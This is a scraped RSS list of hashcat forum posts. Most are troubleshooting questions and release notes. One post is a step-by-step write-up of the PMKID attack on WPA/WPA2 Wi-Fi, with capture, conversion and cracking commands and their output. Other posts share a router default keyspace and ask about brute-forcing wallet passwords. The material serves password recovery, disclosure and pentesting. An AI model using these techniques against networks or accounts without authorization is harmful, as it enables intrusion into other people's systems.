Quantcast
Channel: hashcat Forum - All Forums
Viewing all 8214 articles
Browse latest View live

error v4.1.0

$
0
0
However, I get this error: for Windows 7

v4.1.0

hashcat-4.1.0>hashcat64.exe  -m XXXX -b
hashcat (v4.1.0) starting...

./hashcat.pid: No such file or directory

./hashcat.outfiles: No such file or directory



older hashcat v4.0.0 working 

Hope that helps!

DiskCryptor encrypted ISO

$
0
0
Hello. Is possible to brute force encrypted ISO by DiskCryptor?
I have encrypted AES-Twofish-Serpent but i forgot a part of my password...

Disable Cracking performance lower than expected?

Wpa speed dropping

$
0
0
Hello there,

Can some one tell me why my wpa speed slow's down about 30sec after starting. Just bought my new pc last week.
Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU

Session..........: 2018-08-01
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: C:\Program Files\HashcatGUI_1.00r3\hashcat-4.1.0\vm1.hccapx
Time.Started.....: Wed Aug 01 18:36:33 2018 (2 secs)
Time.Estimated...: Sat Aug 04 17:10:11 2018 (2 days, 22 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 abcdefghjklmnpqrstuvwxyz, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   433.3 kH/s (91.33ms) @ Accel:64 Loops:128 Thr:1024 Vec:1

Session..........: 2018-08-01
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: C:\Program Files\HashcatGUI_1.00r3\hashcat-4.1.0\vm1.hccapx
Time.Started.....: Wed Aug 01 18:36:33 2018 (26 secs)
Time.Estimated...: Mon Aug 06 22:52:02 2018 (5 days, 4 hours)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 abcdefghjklmnpqrstuvwxyz, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   246.1 kH/s (91.72ms) @ Accel:64 Loops:128 Thr:1024 Vec:1

Am I missing something

Cheers Kev

Getting both hashes cracked and not cracked in one file?

$
0
0
I am struggling to figure out a way to get both cracked hashes and uncracked hashes in one file after a cracking session.

Any ideas?

Generating dictonary

$
0
0
Hello
What is the best solution to generating a dictionary that cracks 8 characters password with only big letters (A-Z). 
I check that combination should be cracked in 15days so is possible to generate that dictionary in parts that I can run it with breaks?

I have a question about password include question mark

$
0
0
Hello.


My English skill is so bad. Please understand that..

I want to find my password.

So, I followed FAQ.

The Link: https://hashcat.net/wiki/doku.php?id=fre..._questions

"I have a half-known password. I know the first 4 letters, can hashcat get the rest of the password?"


I expect hashcat finds last password. I input password like this, "zz*4$?_ XXXXXXXXXXXXXX
But in my case the password include ? (question mark)

Full input is
 hashcat -m 14600  -a 3 -w 3 header.luks "zz*4\$?_XXXXXXXXX@XiXoNo?a?a?a?a?"  -i --increment-min 20

Hashcat makes candidates like this

zz*4130_ XXXXXXXXX@XiXoNo-> zz*4130_ XXXXXXXXX@XiXoNo{
But as I know my password first 6 letters is "zz*4130...."

So, I try change password input "zz*4\$?_XXXXXXXXXXXXXX


Then, occured Syntax error.


I make various attempts but results were same.

How to input correctly, if password include ? (question mark).

I really want to find answer.




Thank you for read my post.

Spectre/Meltdown patch a prob?

$
0
0
Did a quick search and came up blank.
But does the Spectre/meltdown patches effect cracking speeds?
I've heard performance hits all over the place (5%-30%)
Ubuntu server 16.04.4 lts

tia.

hashcat v4.2.0

$
0
0


Welcome to hashcat v4.2.0! 

Download binaries or sources: https://hashcat.net/hashcat/ 



This release is mostly about expanding support for new algorithms and fixing bugs:
  • Added hash-mode 16700 = FileVault 2
  • Added hash-mode 16800 = WPA-PMKID-PBKDF2
  • Added hash-mode 16801 = WPA-PMKID-PMK
  • Added hash-mode 16900 = Ansible Vault

Thanks to @hops_ch for contributing the Ansible Vault mode!



Improvements:
  • Added JtR-compatible support for hex notation in the rules engine
  • Added OpenCL device utilization to the status information in machine-readable output
  • Added missing NV Tesla and Titan GPU details to tuning database
  • General file handling: Abort if a byte-order mark (BOM) is detected in a wordlist, hashlist, maskfile or rulefile
  • HCCAPX management: Use advanced hints in message_pair stored by hcxtools about endian bitness of replay counter
  • OpenCL kernels: Abort session if kernel self-test fails
  • OpenCL kernels: Add '-pure' prefix to kernel filenames to avoid problems caused by reusing existing hashcat installation folder
  • OpenCL kernels: Removed the use of 'volatile' keyword in inline assembly instructions where it is not needed
  • OpenCL kernels: Switched array pointer types in function declarations in order to be compatible with OpenCL 2.0
  • Refactored code for --progress-only and --speed-only calculation
  • SIP cracking: Increased the nonce field to allow a salt of 1024 bytes
  • TrueCrypt/VeraCrypt cracking: Do an entropy check on the TC/VC header on start
Notes:
  • The removal of 'volatile' keyword has a large positive impact on cracking performance on macOS
  • The refactored code for --progress-only is important if hashcat is used in combination with a distributed overlay such as hashtopolis


Fixed Bugs:
  • Fixed a function declaration attribute in -m 8900 kernel that led to unusable -m 9300 (which shares kernel code with -m 8900)
  • Fixed a miscalculation in --progress-only mode output for extremely slow kernels like -m 14800
  • Fixed a missing check for errors on OpenCL devices leading to invalid removal of the restore file
  • Fixed a missing kernel in -m 5600 in combination with -a 3 and -O if mask is >= 16 characters
  • Fixed detection of AMD_GCN version when the rocm driver is used
  • Fixed missing code section in -m 2500 and -m 2501 to crack corrupted handshakes with a LE endian bitness base
  • Fixed a missing check for hashmodes using OPTS_TYPE_PT_UPPER causing the self-test to fail when using combinator and hybrid modes


- atom

Dictionary for long passwords - Tips and ideas

$
0
0
Hi,

I want to create a good dictionary as part of pen testing that attempts to crack NTLM hashes that are minimum 16 characters in length and with password complexity requirements. Do any of you have experience pen testing passwords of such a length? Any ideas on how I should proceed?

My initial thought was that people using passwords of 16+ characters in length would mostly use pass phrases (I.e. "I love my two dogs!"). So perhaps combining words in a common wordlist would be a way to go? Right now I have created a list of approx 650k+ words, names, dates etc. Would combining these be a way to go? If so, how? I see that there are several python/ruby scripts for this purpose... but I feel like I should have some kind of rules and not just combine words randomly.

I have also tried using the crackstation wordlist and running it through a filter that requires 16+ chars and password complexity - which resulted in the size going from 15gb to 38mb...

Any tips? I have little experience with password cracking, so any guidance will be highly appriciated!

Default router keyspace for TelstraXXXX

$
0
0
I have found the default keyspace for TelstraXXXX wifi networks it is 0-9 with a length of 10 thought I would post this here as I haven't found this anywhere else online I don't have any pictures right now so you will have to take my word for it Tongue shouldn't hurt if someone tested this as it would only take a few hours to crack

cap to hccapx - best practices ?

$
0
0
Hi,

What's the practice when converting .(p)cap files to hccapx?

Some users adivse cap2hccapx from hashcat-utils, while some other users advise to use hcxpcaptool from ZerBea.

What's the diffenrece between both? What is the recommanded process?

Thank you !

Noob - Understanding hashcat input format

$
0
0
Hello,

I'm trying to understand the hashcat input format for a HMAC-SHA256 hash.
I have read this page https://hashcat.net/wiki/doku.php?id=example_hashes many times but I do not understand the input format for HMAC-SHA256 (and more globally the input formats announced in the whole page).
 
Code:
(key = $pass) ...(key = $salt) ... what does it means ?


I have the hash and the salt, I want hashcat to find the key used.


I generated a test vector using python :
Code:
>>> import hashlib
>>> import binascii
>>> input = b'easy little pony'
>>> salt = binascii.unhexlify(b'e65814e4382759f85550029e723dc7e7')
>>> H = hashlib.pbkdf2_hmac('sha256', input, salt, 100000)
>>> print(binascii.hexlify(H))
b'a5c87829cadf7b75bf4a7efc19e0f39b99c5e80dc8d64109fb7a8ce40d4d8b46'

So the input I tried to give to hashcat is the following :
Code:
<hash>:<salt>

a5c87829cadf7b75bf4a7efc19e0f39b99c5e80dc8d64109fb7a8ce40d4d8b46:e65814e4382759f85550029e723dc7e7


And I have filled my dictionnary with some tests values, including the text "easy little pony".

I tried using this command (and all the modes from 1410 to 1460 and 10900) :
Code:
hashcat -a0 -m1450 fileWithMyHash.txt myThreeWordsDictionnary.txt



Can you confirm me the mode I picked is correct ?
Is the input supposed to be hex-encoded ? (hash and salt)


Thank you

how to take hash with winrar?

$
0
0
Hi, people!

I need the help again.
I don't understand this method. I investigate the RAR file. I have stopped the first steps.
As I can take or find a hash file from the RAR file - that I can crack.



I tried various services but I won't understand as to make it by means of windows

New attack on WPA/WPA using PMKID

$
0
0
In this writeup, I'll describe a new technique to crack WPA PSK (Pre-Shared Key) passwords.

In order to make use of this new attack you need the following tools:

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follow:
  • No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string



Attack details:

The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

[Image: wireshark_pmkid.png]

The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label "PMK Name", the access point's MAC address and the station's MAC address.

Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector.

We receive all the data we need in the first EAPOL frame from the AP.



How to reproduce:

1. Run hcxdumptool to request the PMKID from the AP and to dump the recieved frame to a file (in pcapng format).

Code:
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Output:

Quote:start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If an AP recieves our association request packet and supports sending PMKID we will see a message "FOUND PMKID" after a moment:

Quote:[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Note: Based on the noise on the wifi channel it can take some time to recieve the PMKID. We recommend running hcxdumptool up to 10 minutes before aborting.

2. Run hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat.

Code:
$ ./hcxpcaptool -z test.16800 test.pcapng

Output:

Quote:start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

The content of the written file will look like this:

Quote:2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The columns are the following (all hex encoded):
  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

Note: While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic

Code:
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

3. Run hashcat to crack it.

Basically we can attack this hash as any other hash type. The hash-mode that we need to use is 16800.

Code:
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Output:

Quote:hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

There's also support for hash-mode 16801, which allows skipping the computation of the PMK - which is the computation that makes cracking WPA so slow. Pre-computing PMK can be useful in cases where you are on site and you cannot transfer a hash to a remote cracking rig because of an NDA. The goal is to run hashcat on your notebook which you can bring to the site.

The mode 16801 expects a list of pre-computed PMKs, as hex encoded strings of length 64, as the input wordlist. To pre-compute the PMKs you can use the hcxkeys tool. The hcxkeys tools require the ESSID, so you need to ask for the ESSID from your client in advance.

Configuration problem

$
0
0
Hi everyone, 

i want to test hashcat with this password kadi1830 its for a mac login and the hash his this one
E3AAD692DB9443A8A694C9DD63DD2F9CF354F27D

but i doesnt work... so i suppose my configuration its not good, can you help me ?

thanks !

https://www.cjoint.com/doc/18_08/HHevlh3...xemple.jpg

noob question

Blockchain second passwords

$
0
0
How can i bruteforce blockchain second password?

hcxpcaptool - output possible WPA/WPA2 plainmasterkey list

$
0
0
Hi,
I'm quite old to hash cracking but quite new to WPA stuff, and I take the new Zerbea tools release opportunity to learn and share.

I don't know if hashcat forum it the best place to discuss about these tools ? Maybe it could feed the hcxtools github wiki as well ?

Anyway, here is my question:
Code:
hcxpcaptool -h
(..)
-P <file> : output possible WPA/WPA2 plainmasterkey list

-> What can I do with this output file containing PMKs?

Assumption:
I saw the tool wlanpmk2hcx will "convert plainmasterkey and ESSID for use with hashcat hash-mode 12000"
I notice 12000 is faster than 2500.
Does it mean I can crack the password of my cap file using mode 12000 (which is faster) with the given PMK and ESSID ?

Thanks.

Hybrid Worldlist + Mask 0 length mask

$
0
0
Hi guys,

I'm new to using hashcat so there may be a better way to do this that i don't know, but I was wondering if there was a way to do hybrid mode and check with a 0 length mask. I tried using --increment and tried settings --min-increment to 0, but it isn't a valid value. It requires 1 at the minimum. I want to be able to check against the Wordlist + Mask as well as just the word List, is there a way to do that?

(For clarity)

Given this word list:
cat
dog

I want to check:
cat
cat0
cat1
cat2...

dog
dog0
dog1
dog2...

Thanks!
Viewing all 8214 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>